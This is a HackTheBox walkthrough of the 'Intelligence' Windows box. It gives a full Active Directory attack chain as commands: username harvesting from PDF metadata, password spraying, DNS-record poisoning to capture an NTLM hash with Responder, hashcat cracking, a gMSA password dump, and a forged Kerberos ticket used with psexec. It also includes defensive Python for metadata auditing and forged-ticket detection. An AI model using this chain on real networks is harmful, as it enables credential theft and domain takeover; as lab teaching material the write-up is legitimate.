Intelligence HacktheBox Walkthrough
Introduction
Intelligence is a CTF Windows box rated “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and a silver ticket for privilege escalation.
Table of Contents
Network Scanning
- Nmap
Enumeration
- Directory enumeration to find PDFs
- Extracting usernames from the PDFs’ exif data
- Hunting for a password in the PDFs and logging in to SMB to find a PowerShell script that runs every 5 minutes
- Adding a DNS record to catch an NTLM hash
- NT hash of the gMSA svc_int$
Exploitation
- Obtaining TGT
Privilege Escalation
- Performing silver ticket attack
Let’s deep dive into this.
Network Scanning
The dedicated IP address of the machine is 10.129.163.131. We’ll run an nmap scan against it.
nmap -sV -p- 10.129.163.131
We found many ports open; 53 – DNS, 80 – HTTP and 445 – SMB caught our eye.
Enumeration
We first headed over to SMB and tried listing shares without a password, but it was not fruitful.
We then headed over to the website and saw various PDFs available to download.
We downloaded these PDFs, which contained some written material. Upon checking their exif data we saw the authors’ names, which could be actual users in the Active Directory on the server.
To verify that these users exist, we copy them into a file and use kerbrute’s userenum function:
echo "Jose.Williams" > usernames
echo "William.Lee" >> usernames
kerbrute userenum -d intelligence.htb --dc 10.129.163.131 usernames
Now that the validity of these users has been confirmed, let’s look for any more PDFs in the /documents directory on the server.
Since we don’t have permission to list the directory, we can fuzz the PDF file names and check whether each one exists. The PDFs downloaded above are named in the format YYYY-MM-DD followed by “-upload.pdf”, so I wrote a script that generates these dates and then appended “-upload.pdf” to each of them.
#!/bin/bash
# fuzz_date.sh: print every date from start to end, one per line, as YYYY-MM-DD
start=2020-01-01
end=2022-01-01
while ! [[ $start > $end ]]; do
    echo "$start"
    start=$(date -d "$start + 1 day" +%F)
done
Run the script, then append the file-name suffix to every line:
./fuzz_date.sh > datelist.txt
head -n 3 datelist.txt
sed -i 's/$/-upload.pdf/' datelist.txt
head -n 3 datelist.txt
Now that we have a wordlist ready, we feed it to DIRB and save the PDFs that exist to a file called existing.txt:
dirb http://10.129.163.131/documents/ datelist.txt -o existing.txt
DIRB found many other PDFs on the server and saved their absolute URLs to existing.txt. We need to clean this file so that each line contains exactly one URL; it will be used in a moment.
sed 's/[^ ]* //' existing.txt > 2.txt
sed 's/\s.*$//' 2.txt > 3.txt
head -n 4 3.txt
rm existing.txt 2.txt && mv 3.txt existing.txt
Now we can download all the PDFs at once (mass download) using wget like this:
wget -i /home/kali/hackthebox/intelligence/existing.txt
Now, I went through the files one by one and found a password in one of the PDFs.
But this password did not belong to the two users we had found earlier. So we looked around and found that many other users are revealed through exif data. Hence we extracted the Creator field from every PDF’s exif data and saved the usernames to a file, one user per line.
echo "NewIntelligenceCorpUser9876" > password.txt
exiftool *.pdf | grep Creator > u1.txt
sed 's/.*://' u1.txt > u2.txt
sed 's/[^ ]* //' u2.txt > u3.txt
rm u1.txt u2.txt
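The same leak can be checked for before documents are published. The following is an added example, not code from the original walkthrough: it parses the Info dictionary of a small PDF constructed inline (not one of the box’s documents) and flags metadata values shaped like the First.Last account names seen in this domain. The First.Last pattern is an assumption taken from the usernames above.

```python
import re

# Constructed sample document (not one of the PDFs from the box): a minimal PDF
# whose Info dictionary carries a Creator value shaped like a domain account.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog >>\nendobj\n"
    b"2 0 obj\n<< /Creator (Jose.Williams) /Author (Marketing Team)"
    b" /Producer (Example Writer 1.0) >>\nendobj\n"
    b"trailer\n<< /Info 2 0 R >>\n%%EOF\n"
)

# Info keys that office tools commonly fill from the logged-in user's name.
INFO_KEYS = ("Creator", "Author")
# Assumed account naming convention in this domain: First.Last
ACCOUNT_RE = re.compile(r"^[A-Za-z]+\.[A-Za-z]+$")


def extract_info_strings(pdf_bytes, keys=INFO_KEYS):
    """Return {key: value} for literal-string entries in an uncompressed Info
    dictionary. Hex strings and Info objects packed into compressed object
    streams (PDF 1.5+) are not handled here; exiftool or pypdf cover those."""
    found = {}
    for key in keys:
        match = re.search(rb"/" + key.encode() + rb"\s*\(([^)]*)\)", pdf_bytes)
        if match:
            found[key] = match.group(1).decode("latin-1")
    return found


def leaked_accounts(pdf_bytes):
    """Metadata entries that would hand an outsider a valid-looking username."""
    return sorted(
        (key, value)
        for key, value in extract_info_strings(pdf_bytes).items()
        if ACCOUNT_RE.match(value)
    )


if __name__ == "__main__":
    for key, value in leaked_accounts(SAMPLE_PDF):
        print(f"{key} field leaks an account name: {value}")
```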
Exploitation
Now we can use crackmapexec to test every username in the list against the password we found.
crackmapexec smb 10.129.163.131 -u u3.txt -p NewIntelligenceCorpUser9876
We did find one valid entry!
User: Tiffany.Molina
Now we tried to list the SMB shares using the obtained credentials.
smbclient -L 10.129.163.131 -U Tiffany.Molina%NewIntelligenceCorpUser9876
The share called “IT” contained an interesting PowerShell script called downdetector.ps1. This script ran every 5 minutes: it looked up AD objects whose name started with ‘web’ and sent a WebRequest to each one, checking for an HTTP status 200.
We need this WebRequest to reach our machine instead, so we need to add a DNS record that points to us and capture the authentication request it sends. For this we’ll be using the DNSUpdate script, which can be found here.
git clone https://github.com/Sagar-Jangam/DNSUpdate.git
cd DNSUpdate
pip3 install -r requirements.txt
Let us first start Responder on our local system, listening on the HTB VPN tunnel interface.
We can add the DNS record using the following command.
python3.10 DNSUpdate.py -DNS 10.129.163.131 -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a ad -r webharsh -d 10.10.16.10
It got added! We waited about 5 minutes and Responder captured the hash of the user Ted.Graves.
Now we copy this hash into a file called “hash” and run hashcat on it. Mode 5600 is the hashcat code for NetNTLMv2 hashes.
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
As you can see, we have received a password!
Now that I had the credential for Ted, I immediately used ldapsearch to dump information about the directory on the server.
ldapsearch -H ldap://10.129.163.131 -x -W -D "Ted.Graves@intelligence.htb" -b "dc=intelligence,dc=htb"
This gave me an interesting insight: a group managed service account (gMSA) existed in the domain.
This gMSA was trusted for delegation to WWW, so its password can be dumped now that we have Ted’s credential (check the article here). We will use the gMSADumper tool to do this; you can download it here.
We can dump the account’s hash using the following commands (add intelligence.htb to /etc/hosts first):
echo "10.129.163.131 intelligence.htb" >> /etc/hosts
git clone https://github.com/micahvandeusen/gMSADumper.git
cd gMSADumper
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
Voila! We received a hash of the service account.
With this service account’s hash, we can use the Impacket toolkit’s getST.py script to create a silver ticket. But we encountered a problem with this. After some googling, it turned out that we need to sync our clock with the server’s time for the silver ticket to work: Kerberos rejects requests whose timestamp differs from the KDC’s clock by more than the allowed skew (5 minutes by default). We do this as follows:
apt install ntpdate
sudo ntpdate 10.129.163.131
Post Exploitation
Make sure impacket is installed and upgraded.
pip3 install impacket --upgrade
Now, we will use getST.py to generate ourselves a silver ticket using the command:
python3 /usr/share/doc/python3-impacket/examples/getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :6e03616eef48ba6a15be62280aefcdb2 -impersonate administrator
We need to export administrator.ccache first and then add dc.intelligence.htb to our hosts file. Load the ccache ticket by setting the KRB5CCNAME environment variable to the ticket path. Impacket tools read this variable, pick up the Kerberos ticket stored in administrator.ccache and use it to authenticate to the domain.
export KRB5CCNAME=administrator.ccache
echo "10.129.163.131 dc.intelligence.htb" >> /etc/hosts
klist
Finally, we can use Impacket’s psexec to connect as an administrator and snag our root flag!
python3 /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass dc.intelligence.htb
cd ../../Users/Administrator
type root.txt
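From the defender’s side, the distinguishing trait of a forged service ticket is that it is presented straight to the service, so the KDC never logs a ticket request for it. The following is an added example, not code from the original walkthrough: it correlates constructed Windows Security events (4769, a Kerberos service ticket was requested, from the DC; 4624, an account logged on, from the target host) and flags Kerberos logons with no ticket request behind them. It assumes both logs are collected centrally and that the default 600-minute service-ticket lifetime applies.

```python
from datetime import datetime, timedelta

# Constructed sample events (not logs from the box). Tuples are
# (timestamp, event id, target user, detail): for 4769 the detail is the
# requested SPN, for 4624 it is the logon's Authentication Package.
DC_KDC_EVENTS = [
    ("2021-07-01T10:00:05", 4769, "Ted.Graves", "WWW/dc.intelligence.htb"),
    ("2021-07-01T10:01:10", 4769, "Tiffany.Molina", "cifs/dc.intelligence.htb"),
]
HOST_LOGON_EVENTS = [
    ("2021-07-01T10:00:07", 4624, "Ted.Graves", "Kerberos"),
    ("2021-07-01T10:01:12", 4624, "Tiffany.Molina", "Kerberos"),
    # A forged service ticket never passes through the KDC, so no 4769 exists
    # for this Administrator logon: that absence is the indicator.
    ("2021-07-01T10:09:30", 4624, "Administrator", "Kerberos"),
    # NTLM logons involve no service ticket and are out of scope for this check.
    ("2021-07-01T10:09:45", 4624, "Administrator", "NTLM"),
]

# Default "Maximum lifetime for service ticket" in AD is 600 minutes, so a
# legitimate 4769 may precede the logon that uses the ticket by up to that long.
TICKET_LIFETIME = timedelta(minutes=600)


def unrequested_kerberos_logons(kdc_events, logon_events, lifetime=TICKET_LIFETIME):
    """Return (timestamp, user) for Kerberos logons where the KDC recorded no
    service-ticket request for the same account within `lifetime` beforehand."""
    requests = [
        (datetime.fromisoformat(ts), user.lower())
        for ts, event_id, user, _spn in kdc_events
        if event_id == 4769
    ]
    flagged = []
    for ts, event_id, user, auth_pkg in logon_events:
        if event_id != 4624 or auth_pkg != "Kerberos":
            continue
        logon_time = datetime.fromisoformat(ts)
        backed = any(
            req_user == user.lower() and logon_time - lifetime <= req_time <= logon_time
            for req_time, req_user in requests
        )
        if not backed:
            flagged.append((ts, user))
    return flagged


if __name__ == "__main__":
    for ts, user in unrequested_kerberos_logons(DC_KDC_EVENTS, HOST_LOGON_EVENTS):
        print(f"{ts}: Kerberos logon by {user} with no matching 4769 on the DC")
```

Because the forged ticket carries whatever lifetime the attacker chose, the matching window here is a tuning knob; shortening it trades missed legitimate renewals for earlier alerts.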
Conclusion
The lab does not carry traditional CTF-like qualities; it closely resembles what one can see in real life. From extracting information from PDFs, to validating the existence of a user, to compromising the Admin account by exploiting a misconfiguration, the lab gives a lot to think about regarding the actual security posture of Active Directory environments. No CVEs were exploited in the lab, and yet this type of exploitation is very common. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here